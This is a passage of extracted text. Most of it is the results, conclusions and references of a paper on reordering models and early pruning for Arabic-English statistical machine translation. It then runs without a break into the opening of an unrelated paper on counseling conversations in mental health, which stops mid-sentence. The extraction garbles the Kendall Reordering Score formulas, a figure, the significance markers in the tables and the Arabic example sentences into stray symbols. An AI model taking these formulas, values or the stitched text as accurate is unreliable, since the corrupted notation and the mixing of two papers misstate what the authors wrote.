7The in-domain parallel data includes all the provided cor- pora except the UN proceedings, and the non-newswire parts of the small GALE-Y1-Q4 corpus (that is 9K sentences of audio transcripts and web data). As reported by Green et al. (2010) the removal of UN data does not affect baseline performances on the news benchmarks. 8Automatically detected by means of shallow syntax rules. 9The Arabic Treebank tokenization scheme isolates con- junctions w+ and f+, prepositions l+, k+, b+, future marker s+, pronominal suffixes, but not the article Al+. 332 5.1 Reordering model intrinsic evaluation Before proceeding to the SMT experiments, we evaluate the performance of the WaW reorder- ing model in isolation. All the tested configura- tions are trained with the freely available MegaM Toolkit10, implementing the conjugate gradient method (Hestenes and Stiefel, 1952), in maximum 100 iterations. Training samples are generated within a sampling window of width #=10, from a subset (30K sentences) of the parallel data described above, resulting in 8M training word pairs11. Test samples are generated from TIDES-MT04 (1324 sen- tences, 370K samples with #=10), one of the corpora included in our SMT training data. Features with less than 20 occurrences are ignored. Classification accuracy. Table 3 presents preci- sion, recall, and F-score achieved by different fea- ture subsets, where W stands for word-based, P for POS-based and C for chunk-based feature templates. We can see that all feature types contribute to im- prove the classifier’s performance. The word-based model achieves the highest precision but a very low recall, while the POS-based has much more bal- anced scores. A better performance overall is ob- tained by combining word-, POS- and mixed word- POS-based features (62.6% F-score). Finally, the addition of chunk-based features yields a further im- provement of about 1 point, reaching 63.8% F-score. Given these results, we decide to use the W,P,C model for the rest of the evaluation. Features (templates) P R F W [1-7] 73.1 16.4 26.8 P [8-15] 69.5 54.8 61.3 W,P [1-17] 70.2 56.5 62.6 W,P,C [1-21] 70.6 58.1 63.8 Table 3: Classification accuracy of the WaW reordering model on TIDES-MT04, using different feature subsets. The template numbers refer to the rows of Table 1. Ranking accuracy. A more important aspect to evaluate for our application is how well our model’s scores can rank a typical set of reordering options. In fact, the WaW model is not meant to be used as 10http://www.cs.utah.edu/˜hal/megam/ (Daumé III, 2004). 11This is the maximum number of samples manageable by MegaM. However, even scaling from 4M to 8M was only slightly helpful in our experiments. In the future we plan to test other learning approaches that scale better to large data sets. a stand-alone classifier, but as one of several SMT feature functions. Moreover, for early reordering pruning to be effective, it is especially important that the correct reordering option be ranked in the top n among those available at the time of a given hypoth- esis expansion. In order to measure this, we simulate the decoding process by traversing the source words in target order and, for each of them, we examine the ranking of all words that may be translated next (i. e. the uncovered positions within a given DL). We check how often the correct jump was ranked first (Top-1) or at most third (Top-3). We also com- pute the latter score on long reorderings only (Top- 3-long): i. e. backward jumps with distortion D>7 and forward jumps with D>6. In Table 4, results are compared with the ranking produced by standard distortion, which always favors shorter jumps. Two conditions are considered: DL=10 corresponding to the sampling window # used to produce the training data, and DL=18 that is the maximum distortion of jumps that will be considered in our early-pruning SMT experiment. Model DL DL-err Top-1 Top-3 Top-3-long back forw. Distortion 10 2.4 61.8 79.6 50.7 66.0 18 0.8 62.0 80.0 18.9 52.3 WaW 10 2.4 71.2 91.2 76.4 69.3 18 0.8 71.2 91.8 68.0 51.8 Table 4: Word-to-word jump ranking accuracy (%) of standard distortion and WaW reordering model, in dif- ferent DL conditions. DL-err is the percentage of correct jumps beyond DL. The test set consists of 40K reordering decisions: one for each source word in TIDES-MT04. We can see that, in terms of overall accuracies, the WaW reordering model outperforms standard distor- tion by a large margin (about 10% absolute). This is an important result, considering that the jump length, strongly correlating with the jump likeli- hood, is not directly known to our model. As re- gards the DL, the higher limit naturally results in a lower DL-error rate (percentage of correct jumps be- yond DL): namely 0.8% instead of 2.4%. However, jump prediction becomes much harder: Top-3 accu- racy of long jumps by distortion drops from 50.7% to 18.9% (backward) and from 66.0% to 52.3% (for- ward). Our model is remarkably robust to this effect on backward jumps, where it achieves 68.0% accu- 333 racy. Due to the syntactic characteristics of Arabic and English, the typical long reordering pattern con- sists in (i) skipping a clause-initial Arabic verb, (ii) covering a long subject, then finally (iii) jumping back to translate the verb and (iv) jumping forward to continue translating the rest of the sentence (see Fig. 3 for an example).12 Deciding when to jump back to cover the verb (iii) is the hardest part of this process, and that is precisely where our model seems more helpful, while distortion always prefers to proceed monotonically achieving a very low ac- curacy of 18.9%. In the case of long forward jumps (iv), instead, distortion is advantaged as the correct choice typically corresponds to translating the first uncovered position, that is the shortest jump avail- able from the last translated word. Even here, our model achieves an accuracy of 51.8%, only slightly lower than that of distortion (52.3%). In summary, the WaW reordering model signifi- cantly outperforms distortion in the ranking of long jumps. In the large majority of cases, it is able to rank a correct long jump in the top 3 reordering op- tions, which suggests that it can be effectively used for early reordering pruning. 5.2 SMT experimental setup Our SMT systems are built with the Moses toolkit, while word alignment is produced by the Berke- ley Aligner (Liang et al., 2006). The baseline de- coder includes a phrase translation model, a lexi- calized reordering model, a 6-gram target language model, distortion cost, word and phrase penalties. More specifically, the baseline reordering model is a hierarchical phrase orientation model (Tillmann, 2004; Koehn et al., 2005; Galley and Manning, 2008) trained on all the available parallel data. This variant was shown to outperform the default word- based on an Arabic-English task. To make our base- line even more competitive, we apply early distor- tion cost, as proposed by Moore and Quirk (2007). This function has the same value as the standard one over a complete translation hypothesis, but it antic- ipates the gradual accumulation of the cost, mak- ing hypotheses of the same length more compara- ble to one another. Note that this option has no ef- 12Clearly, we would expect different figures from testing the model on another language pair like German-English, where the verb is often postponed in the source with respect to the target. fect on the distortion limit, but only on the distor- tion cost feature function. As proposed by Johnson et al. (2007), statistically improbable phrase pairs are removed from the translation model. The lan- guage models are estimated by the IRSTLM toolkit (Federico et al., 2008) with modified Kneser-Ney smoothing (Chen and Goodman, 1999). Feature weights are optimized by minimum BLEU-error training (Och, 2003) on dev06-nw. To reduce the effects of the optimizer instability, we tune each configuration four times and use the av- erage of the resulting weight vectors to translate the test sets, as suggested by Cettolo et al. (2011). Finally, eval08-nw is used to select the early prun- ing parameters for the last experiment, while eval09- nw is always reserved as blind test. 5.3 Evaluation metrics We evaluate global translation quality with BLEU (Papineni et al., 2002) and METEOR (Banerjee and Lavie, 2005). These metrics, though, are only in- directly sensitive to word order, and especially un- likely to capture improvements at the level of long- range reordering. For this reason, we also com- pute the Kendall Reordering Score or KRS (Birch et al., 2010) which is a positive score based on the Kendall’s Tau distance between the source-output permutation % and the source-reference permuta- tions ": KRS(%, ") = (1 ! # K(%, ")) · BP K(%, ") = "n i=1 "n j=1 d(i, j) 1 2 n(n ! 1) d(i, j) = $ 1 if %i < %j and "i > "j 0 otherwise where BP is a sentence-level brevity penalty, similar to that of BLEU. The KRS is robust to lexical choice because it performs no comparison between output and reference words, but only between the positions of their translations. Besides, it was shown to corre- late strongly with human judgements of fluency. Our work specifically addresses long-range re- ordering phenomena in language pairs where these are quite rare, although crucial for preserving the source text meaning. Hence, an improvement at this level may not be detected by the general-purpose metrics. We then develop a KRS variant that is only 334 sensitive to the positioning of specific input words. Assuming that each input word fi is assigned a weight !i, the formula above is modified as follows: d"(i, j) = $ !i+!j if %i < %j and "i > "j 0 otherwise A similar element-weighted version of Kendall Tau was proposed by Kumar and Vassilvitskii (2010) to evaluate document rankings in information retrieval. Because long reordering errors in Arabic-English mostly affect verbs, we set the weights to 1 for verbs and 0 for all other words to only capture verb re- ordering errors, and call the resulting metric KRS-V. The source-reference word alignments needed to compute the reordering scores are generated by the Berkeley Aligner previously trained on the training data. Source-output word alignments are instead ob- tained from the decoder’s trace. 5.4 Results and discussion To motivate the choice of our baseline setup (early distortion cost and DL=8), we first compare the per- formance of standard and early distortion costs un- der various DL conditions. !"#$% !"#&'()% !"#($% !"#&% !"#$% !"#()% !"#($% !"#"$ !%#"$ !!#"$ !&#"$ !'#"$ &(#"$ &)#"$ &*#"$ &+#"$ ,+#)$ ,+#%$ ,,#)$ ,,#%$ ,"#)$ * + , % -"./% -./01$ 23.45./5$ Figure 2: Standard vs early distortion cost results on eval08-nw under different distortion limits (DL), using the medium-size LM. Best scores are on top-right corner. As shown in Fig. 2, most results are close to each other in terms of BLEU and KRS, but early distor- tion consistently outperforms the standard one (sta- tistically significant). The most striking difference appears at a very high distortion limit (18), where standard distortion scores drop by more than 1 BLEU point and almost 7 KRS points! Early distortion is much more robust (only -1 KRS when going from DL=8 to DL=18), which makes our baseline system especially strong at the level of reordering. Table 5 presents the results obtained by integrat- ing the WaW reordering model as an additional feature function, and by applying early reordering pruning. The upper part of the table refers to the medium-scale evaluation, while the lower part refers to the large-scale evaluation. In each part, statis- tical significance is computed against the baseline [B] by approximate randomization as in (Riezler and Maxwell, 2005). Run times are obtained by an Intel Xeon X5650 processor on the first 500 sentences of eval08-nw, and exclude loading time of all models. Medium-scale evaluation. Integrating the WaW model as an additional feature function results in small but consistent improvements in all DL condi- tions, which shows that this type of model conveys information that is missing from the state-of-the-art reordering models. As regards efficiency, the new model makes decoding time increase by 8%. Among the DL settings considered, DL=8 is con- firmed as the optimal one – with or without WaW model. Raising the DL to 18 with no special prun- ing has a negative impact on both translation quality and efficiency. The effect is especially visible on the reordering scores: that is, from 84.7 to 83.9 KRS and from 86.2 to 85.8 KRS-V on eval09-nw. Run times are almost doubled: from 87 to 164 and from 94 to 178 ms/word, that is a 89% increase. We then proceed to the last experiment where the reordering space is dynamically pruned based on the WaW model score. As explained in Sect. 4, a non-prunable-zone of width $=5 is set around the last covered position. To set the early pruning pa- rameters, we perform a grid search over the values (1, 2, 3, 4, 5) for histogram and (0.5, 0.25, 0.1) for relative threshold, and select the values that achieve the best BLEU and KRS on eval08-nw, namely 3 (his- togram) and 0.1 (threshold). The resulting configu- ration is then re-optimized by MERT on dev06-nw. This setting implies that, at a given point of decod- ing where i is the last covered position, a new word can be translated only if: • it lies within a DL of 5 from i, or • it lies within a DL of 18 from i and its WaW reordering score is among the top 3 and at least equal to 1/10 of the best score (in linear space). As shown in Table 5, early pruning achieves the best results overall: despite the high DL, we report 335 DL Reo.models eval08-nw eval09-nw vs-09 ms/ bleu met krs krs-V bleu met krs krs-V krs-V word Using the medium-size LM (147M English tokens): 5 hier.lexreo, early disto 44.7 35.1! 83.0! 84.7! 50.3" 38.1 84.6 85.9 84.7 59 + WaW model 44.8 35.1 83.7 85.4 51.0# 38.3# 85.1# 86.6$ 85.5# 64 8 hier.lexreo, early disto[B] 44.8 35.2 83.4 85.6 50.6 38.1 84.7 86.2 84.8 87 + WaW model 45.0 35.2 83.7$ 85.9 51.1# 38.3# 85.1# 86.8# 85.8# 94 18 hier.lexreo, early disto 44.7 34.9! 82.4! 84.9! 50.3 38.0" 83.9! 85.8" 84.3" 164 + WaW model 44.8 35.2 82.7! 85.5 51.0$ 38.3# 84.2" 86.2 85.2 178 + early reo.pruning($=5) 45.0 35.3 83.7$ 86.3# 50.9 38.3# 84.9 87.0# 86.2# 68 Using the large interpolated LM (2130M English tokens) and double beam-size: 8 hier.lexreo, early disto[B] 46.3 35.0 83.2 85.0 51.6 38.3 84.5 85.8 84.5 2579 18 hier.lexreo, early disto 45.9" 34.9! 81.7! 84.1! 51.4 38.1! 83.0! 84.6! 83.1! 5462 +WaW+reo.pruning($=5) 46.3 35.2 83.4 85.7# 52.8# 38.6# 84.6 86.6# 85.5# 1588 Table 5: Effects of WaW reordering modeling and early reordering pruning on translation quality, measured with % BLEU, METEOR, and Kendall Reordering Score: regular (KRS) and verb-specific (KRS-V). Statistically significant differences with respect to the baseline [B] are marked with #! at the p " .05 level and $" at the p " .10 level. Decoding time is measured in milliseconds per input word. no loss in BLEU, METEOR and KRS, but we actually see several improvements. In particular, the gains on the blind test eval09-nw are +0.3 BLEU, +0.2 ME- TEOR and +0.2 KRS (only METEOR is significant). While these gains are admittedly small, we recall that our techniques affect rare and isolated events which can hardly emerge from the general-purpose evaluation metrics. Moreover, to our knowledge, this is the first time that a PSMT system is shown to maintain a good performance on this language pair while admitting very long-range reorderings. Finally and more importantly, the reordering of verbs improves significantly on both generic tests and on the VS- sentence subset (vs-09): namely, in the latter, we achieve a notable gain of 1.4 KRS-V. Efficiency is also largely improved by our early reordering pruning technique: decoding time is re- duced to 68 ms/word, corresponding to a 22% speed-up over the baseline. Large-scale evaluation. We also investigate whether our methods can be useful in a scenario where efficiency is less important and more data is available for training. To this end, we build a very large LM by interpolating the main LM with three other LMs trained on different Gigaword sec- tions (see Sect. 5). Moreover, we relax the decoder’s beam size from the default value of 200 to 400 hy- potheses, to reduce the risk of search errors and ob- tain the best possible baseline performance. By comparing the large-scale with the medium- scale baseline in Table 5, we note that the addition of LM data is especially beneficial for BLEU (+1.5 on eval08-nw and +1.0 on eval09-nw), but not as much for the other metrics, which challenges the commonly held idea that more data always improves translation quality. Here too, relaxing the DL without special pruning hurts not only efficiency but also translation qual- ity: all the scores decrease considerably, showing that even the stronger LM is not sufficient to guide search through a very large reordering search space. As for our enhanced system, it achieves simi- lar gains as in the medium-scale scenario: that is, BLEU and METEOR are preserved or slightly im- proved despite the very high DL, while all the re- ordering scores increase. In particular, we report sta- tistically significant improvements in the reordering of verbs, which is where the impact of our method is expected to concentrate (+0.7, +0.8 and +1.0 KRS-V on eval08-nw, eval09-nw and vs-09, respectively). These results confirm the usefulness of our method not only as an optimization technique, but also as a way to improve translation quality on top of a very strong baseline. 336 SRC ! ! ! "#$!% &'( )* +, -. /0$%&' &-1! 2 +1 +03* +045(67!8 +9#+77!5 :65 &-3*;24<5( &-73! 045( &-=>?@A( 0B* +CD EF(23* verb subj. obj. compl. ywASl sfyr Almmlkp AlErbyp AlsEwdyp ldY lbnAn EbdAlEzyz xwjp tHrk -h fy AtjAh ... continues ambassador Kingdom Arabian Saudi to Lebanon Abdulaziz Khawja move his in direction REF The Kingdom of Saudi Arabia ’s ambassador to Lebanon Abdulaziz Khawja continues his moves towards ... BASE continue to Saudi Arabian ambassador to Lebanon , Abdulaziz Khwja its move in the direction of ... NEW The Kingdom of Saudi Arabia ’s ambassador to Lebanon , Abdulaziz Khwja continue its move in the direction of ... SRC ;#7*$G'( H( +0 &B5( )I( E4 J<K 65# +L M#NL &-O01 P5 )*QR#7*<5( S! &7=@A( TU*V3W XY. #8; #?7* +, adv. verb obj. subj. compl. fymA dEA -hm r}ys Almktb AlsyAsy l- Hrkp HmAs xAld m$El AlY AltzAm AlHyAd meanwhile called them head bureau political of movement Hamas Khaled Mashal to necessity neutrality REF Meanwhile, the Head of the Political Bureau of the Hamas movement, Khaled Mashal, called upon them to remain neutral BASE The called them, head of Hamas’ political bureau, Khalid Mashal, to remain neutral NEW The head of Hamas’ political bureau, Khalid Mashal, called on them to remain neutral Figure 3: Long reordering examples showing improvements over the baseline system (BASE) when the DL is raised to 18 and early pruning based on WaW reordering scores is enabled (NEW). Long jumps statistics and examples. To better understand the behavior of the early-pruning system, we extract phrase-to-phrase jump statistics from the decoder log file. We find that 132 jumps beyond the non-prunable zone (D>5) were performed to trans- late the 586 sentences of eval09-nw; 38 out of these were longer than 8 and mostly concentrated on the VS- sentence subset (27 jumps D>8 performed in vs-09).13 This and the higher reordering scores sug- gest that long jumps are mainly carried out to cor- rectly reorder clause-inital verbs over long subjects. Fig. 3 shows two Arabic sentences taken from eval09-nw, that were erroneuously reordered by the baseline system. The system including the WaW model and early reordering pruning, instead, pro- duced the correct translation. The first sentence is a typical example of VSO order with a long subject: while the baseline system left the verb in its Ara- bic position, producing an incomprehensible trans- lation, the new system placed it rightly between the English subject and object. This reordering involved two long jumps: one with D=9 backward and one with D=8 forward. The second sentence displays another, less com- mon, Arabic construction: namely VOS, with a per- sonal pronoun object. In this case, a backward jump with D=10 and a forward jump with D=8 were nec- essary to achieve the correct reordering. 13Statistics computed on the medium-LM system. 6 Conclusions We have trained a discriminative model to predict likely reordering steps in a way that is complemen- tary to state-of-the-art PSMT reordering models. We have effectively integrated it into a PSMT decoder as additional feature, ensuring that its total score over a complete translation hypothesis is consistent across different phrase segmentations. Lastly, we have pro- posed early reordering pruning as a novel method to dynamically shape the input reordering space and capture long-range reordering phenomena that are often critical when translating between languages with different syntactic structures. Evaluated on a popular Arabic-English news translation task against a strong baseline, our ap- proach leads to similar or even higher BLEU, ME- TEOR and KRS scores at a very high distortion limit (18), which is by itself an important achievement. At the same time, the reordering of verbs, measured with a novel version of the KRS, is consistently im- proved, while decoding gets significantly faster. The improvements are also confirmed when a very large LM is used and the decoder’s beam size is dou- bled, which shows that our method reduces not only search errors but also model errors even when base- line models are very strong. Word reordering is probably the most difficult as- pect of SMT and an important factor of both its qual- ity and efficiency. Given its strong interaction with the other aspects of SMT, it appears natural to solve 337 word reordering during decoding, rather than before or after it. To date, however, this objective was only partially achieved. We believe there is a promising way to go between fully-integrated reordering mod- els and monolingual pre-ordering methods. This work has started to explore it. Aknowledgments This work was partially funded by the European Union FP7 grant agreement 287658 (EU-BRIDGE). References Yaser Al-Onaizan and Kishore Papineni. 2006. Distor- tion models for statistical machine translation. In Pro- ceedings of the 21st International Conference on Com- putational Linguistics and 44th Annual Meeting of the Association for Computational Linguistics, pages 529–536, Sydney, Australia, July. Jacob Andreas, Nizar Habash, and Owen Rambow. 2011. Fuzzy syntactic reordering for phrase-based statistical machine translation. In Proceedings of the Sixth Work- shop on Statistical Machine Translation, pages 227– 236, Edinburgh, Scotland, July. Satanjeev Banerjee and Alon Lavie. 2005. METEOR: An automatic metric for MT evaluation with improved correlation with human judgments. In Proceedings of the ACL Workshop on Intrinsic and Extrinsic Evalu- ation Measures for Machine Translation and/or Sum- marization, pages 65–72, Ann Arbor, Michigan, June. A. L. Berger, P. F. Brown, S. A. Della Pietra, V. J. Della Pietra, J. R. Gillett, A. S. Kehler, and R. L. Mercer. 1996. Language translation apparatus and method of using context-based translation models. United States Patent, No. 5510981, Apr. Alexandra Birch, Phil Blunsom, and Miles Osborne. 2009. A quantitative analysis of reordering phenom- ena. In StatMT ’09: Proceedings of the Fourth Work- shop on Statistical Machine Translation, pages 197– 205, Morristown, NJ, USA. Alexandra Birch, Miles Osborne, and Phil Blunsom. 2010. Metrics for MT evaluation: evaluating reorder- ing. Machine Translation, 24(1):15–26. Arianna Bisazza and Marcello Federico. 2012. Modi- fied distortion matrices for phrase-based statistical ma- chine translation. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguis- tics (Volume 1: Long Papers), pages 478–487, Jeju Is- land, Korea, July. Arianna Bisazza, Daniele Pighin, and Marcello Fed- erico. 2012. Chunk-lattices for verb reordering in Arabic-English statistical machine translation. Ma- chine Translation, Special Issue on MT for Arabic, 26(1-2):85–103. Arianna Bisazza. 2013. Linguistically Motivated Re- ordering Modeling for Phrase-Based Statistical Ma- chine Translation. Ph.D. thesis, University of Trento. http://eprints-phd.biblio.unitn.it/1019/. Marine Carpuat, Yuval Marton, and Nizar Habash. 2012. Improved Arabic-to-English statistical machine trans- lation by reordering post-verbal subjects for word alignment. Machine Translation, Special Issue on MT for Arabic, 26(1-2):105–120. Mauro Cettolo, Nicola Bertoldi, and Marcello Federico. 2011. Methods for smoothing the optimizer instability in SMT. In MT Summit XIII: the Thirteenth Machine Translation Summit, pages 32–39, Xiamen, China. Stanley F. Chen and Joshua Goodman. 1999. An empiri- cal study of smoothing techniques for language model- ing. Computer Speech and Language, 4(13):359–393. Marta R. Costa-jussà and José A. R. Fonollosa. 2009. State-of-the-art word reordering approaches in statisti- cal machine translation: A survey. IEICE TRANSAC- TIONS on Information and Systems, E92-D(11):2179– 2185. Koby Crammer and Yoram Singer. 2003. Ultraconser- vative online algorithms for multiclass problems. J. Mach. Learn. Res., 3:951–991, March. Hal Daumé III. 2004. Notes on CG and LM-BFGS op- timization of logistic regression. Paper available at http://pub.hal3.name, implementation avail- able at http://hal3.name/megam. Mona Diab, Kadri Hacioglu, and Daniel Jurafsky. 2004. Automatic Tagging of Arabic Text: From Raw Text to Base Phrase Chunks. In Daniel Marcu Susan Dumais and Salim Roukos, editors, HLT-NAACL 2004: Short Papers, pages 149–152, Boston, Massachusetts, USA. Marcello Federico, Nicola Bertoldi, and Mauro Cettolo. 2008. IRSTLM: an Open Source Toolkit for Handling Large Scale Language Models. In Proceedings of In- terspeech, pages 1618–1621, Melbourne, Australia. Minwei Feng, Arne Mauser, and Hermann Ney. 2010. A source-side decoding sequence model for statisti- cal machine translation. In Conference of the Associa- tion for Machine Translation in the Americas (AMTA), Denver, Colorado, USA. Michel Galley and Christopher D. Manning. 2008. A simple and effective hierarchical phrase reordering model. In EMNLP ’08: Proceedings of the Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 848–856, Morristown, NJ, USA. Spence Green, Conal Sathi, and Christopher D. Man- ning. 2009. NP subject detection in verb-initial Ara- bic clauses. In Proceedings of the Third Workshop 338 on Computational Approaches to Arabic Script-based Languages (CAASL3), Ottawa, Canada. Spence Green, Michel Galley, and Christopher D. Man- ning. 2010. Improved models of distortion cost for statistical machine translation. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Com- putational Linguistics (NAACL), pages 867–875, Los Angeles, California. Magnus R. Hestenes and Eduard Stiefel. 1952. Meth- ods of conjugate gradients for solving linear systems. Journal of Research of the National Bureau of Stan- dards, 49(6):409–436. H. Johnson, J. Martin, G. Foster, and R. Kuhn. 2007. Im- proving translation quality by discarding most of the phrasetable. In In Proceedings of EMNLP-CoNLL 07, pages 967–975. Philipp Koehn, Franz Josef Och, and Daniel Marcu. 2003. Statistical phrase-based translation. In Proceed- ings of HLT-NAACL 2003, pages 127–133, Edmonton, Canada. Philipp Koehn, Amittai Axelrod, Alexandra Birch Mayne, Chris Callison-Burch, Miles Osborne, and David Talbot. 2005. Edinburgh system description for the 2005 IWSLT speech translation evaluation. In Proc. of the International Workshop on Spoken Lan- guage Translation, October. P. Koehn, H. Hoang, A. Birch, C. Callison-Burch, M. Federico, N. Bertoldi, B. Cowan, W. Shen, C. Moran, R. Zens, C. Dyer, O. Bojar, A. Constantin, and E. Herbst. 2007. Moses: Open Source Toolkit for Statistical Machine Translation. In Proceedings of the 45th Annual Meeting of the Association for Com- putational Linguistics Companion Volume Proceed- ings of the Demo and Poster Sessions, pages 177–180, Prague, Czech Republic. Ravi Kumar and Sergei Vassilvitskii. 2010. General- ized distances between rankings. In Proceedings of the 19th international conference on World Wide Web, pages 571–580, New York, NY, USA. ACM. Percy Liang, Ben Taskar, and Dan Klein. 2006. Align- ment by agreement. In Proceedings of the Human Language Technology Conference of the NAACL, Main Conference, pages 104–111, New York City, USA, June. Ryan McDonald, Fernando Pereira, Kiril Ribarov, and Jan Hajič. 2005. Non-projective dependency parsing using spanning tree algorithms. In Proceedings of the conference on Human Language Technology and Em- pirical Methods in Natural Language Processing, HLT ’05, pages 523–530, Stroudsburg, PA, USA. Robert C. Moore and Chris Quirk. 2007. Faster beam- search decoding for phrasal statistical machine transla- tion. In In Proceedings of MT Summit XI, pages 321– 327, Copenhagen, Denmark. F. Och and H. Ney. 2002. Discriminative training and maximum entropy models for statistical machine translation. In Proceedings of the 40th Annual Meet- ing of the Association for Computational Linguistics (ACL), pages 295–302, Philadelhpia, PA. Franz Josef Och. 2003. Minimum Error Rate Training in Statistical Machine Translation. In Erhard Hinrichs and Dan Roth, editors, Proceedings of the 41st Annual Meeting of the Association for Computational Linguis- tics, pages 160–167. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: a method for automatic eval- uation of machine translation. In Proceedings of the 40th Annual Meeting of the Association of Compu- tational Linguistics (ACL), pages 311–318, Philadel- phia, PA. Stefan Riezler and John T. Maxwell. 2005. On some pitfalls in automatic evaluation and significance test- ing for MT. In Proceedings of the ACL Workshop on Intrinsic and Extrinsic Evaluation Measures for Ma- chine Translation and/or Summarization, pages 57– 64, Ann Arbor, Michigan, June. Christoph Tillmann. 2004. A Unigram Orientation Model for Statistical Machine Translation. In Pro- ceedings of the Joint Conference on Human Language Technologies and the Annual Meeting of the North American Chapter of the Association of Computa- tional Linguistics (HLT-NAACL). Karthik Visweswariah, Rajakrishnan Rajkumar, Ankur Gandhe, Ananthakrishnan Ramanathan, and Jiri Navratil. 2011. A word reordering model for im- proved machine translation. In Proceedings of the 2011 Conference on Empirical Methods in Natu- ral Language Processing, pages 486–496, Edinburgh, Scotland, UK., July. Dekai Wu. 1997. Stochastic inversion transduction grammars and bilingual parsing of parallel corpora. Computational Linguistics, 23(3):377–403. Sirvan Yahyaei and Christof Monz. 2010. Dynamic dis- tortion in a discriminative reordering model for sta- tistical machine translation. In International Work- shop on Spoken Language Translation (IWSLT), Paris, France. Richard Zens and Hermann Ney. 2006. Discriminative reordering models for statistical machine translation. In Proceedings on the Workshop on Statistical Ma- chine Translation, pages 55–63, New York City, June. R. Zens, F. J. Och, and H. Ney. 2002. Phrase-based sta- tistical machine translation. In 25th German Confer- ence on Artificial Intelligence (KI2002), pages 18–32, Aachen, Germany. Springer Verlag. 339 340 work_v5imgcaijzdjnkkiyoel5azmem ---- Large-scale Analysis of Counseling Conversations: An Application of Natural Language Processing to Mental Health Tim Althoff∗, Kevin Clark∗, Jure Leskovec Stanford University {althoff, kevclark, jure}@cs.stanford.edu Abstract Mental illness is one of the most pressing pub- lic health issues of our time. While counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. In this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. We develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. Applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. 1 Introduction Mental illness is a major global health issue. In the U.S. alone, 43.6 million adults (18.1%) experience mental illness in a given year (National Institute of Mental Health, 2015). In addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (Insel, 2008). In many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (World Health Organization, 2015). However, it is far from obvious how to best conduct counsel- ing conversations. Such conversations are free-form without strict rules, and involve many choices that *Both authors contributed equally to the paper. could make a difference in someone’s life. Thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., Labov and Fanshel, (1977); Haberstroh et al., (2007)). How- ever, recent advances in technology-mediated coun- seling conducted online or through texting (Haber- stroh et al., 2007) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. Here we present the largest study on counseling conversation strategies published to date. We use data from an SMS texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. The data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. We develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). We focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. We find that there are sig- nificant, quantifiable differences between more suc- cessful and less successful counselors in how they conduct conversations. Our findings suggest actionable strategies that are associated with successful counseling: 1. Adaptability (Section 5): Measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. 2. Dealing with Ambiguity (Section 6): We de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. We learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. 3. Creativity (Section 6.3): We quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. 4. Making Progress (Section 7): We develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. Ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. 5. Change in Perspective (Section 8): We de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. We find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. We further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. Further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (Section 9). Such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. The dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. Although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. 2 Related Work Our work relates to two lines of research: Therapeutic Discourse Analysis & Psycholinguis- tics. The field of conversation analysis was born in the 1960s out of a suicide prevention center (Sacks and Jefferson, 1995; Van Dijk, 1997). Since then conversation analysis has been applied to various clinical settings including psychotherapy (Labov and Fanshel, 1977). Work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (Pennebaker et al., 2003). Previous work also found that there are linguistic cues as- sociated with depression (Ramirez-Esparza et al., 2008; Campbell and Pennebaker, 2003) as well as with suicude (Pestian et al., 2012). These find- ings are consistent with Beck’s cognitive model of depression (1967; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with Pyszczynski and Greenberg’s self-focus model of depression (1987; depressed persons engage in higher levels of self-focus than non-depressed per- sons). In this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. Large-scale Computational Linguistics Applied to Conversations. Large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (Niederhoffer and Pennebaker, 2002; Danescu-Niculescu-Mizil, 2012) as well as expressions of social power and status (Bramsen et al., 2011; Danescu-Niculescu- Mizil et al., 2012). Other studies have connected writing to measures of success in the context of re- quests (Althoff et al., 2014), user retention (Althoff and Leskovec, 2015), novels (Ashok et al., 2013), and scientific abstracts (Guerini et al., 2012). Prior http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (Stolcke et al., 2000). Unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- 